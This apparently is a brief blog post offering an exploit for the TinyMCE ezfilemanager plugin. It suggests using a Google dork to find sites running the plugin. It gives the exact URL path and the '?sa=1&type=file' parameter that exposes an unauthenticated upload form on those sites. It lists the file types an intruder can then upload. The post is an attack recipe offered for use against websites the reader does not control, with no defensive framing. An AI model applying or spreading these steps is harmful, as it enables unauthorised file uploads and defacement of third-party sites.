(you can modify this dork for getting mor results from Google )
Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
put ?sa=1&type=file after URL
now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
now see the upload option and you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
0 komentar:
Posting Komentar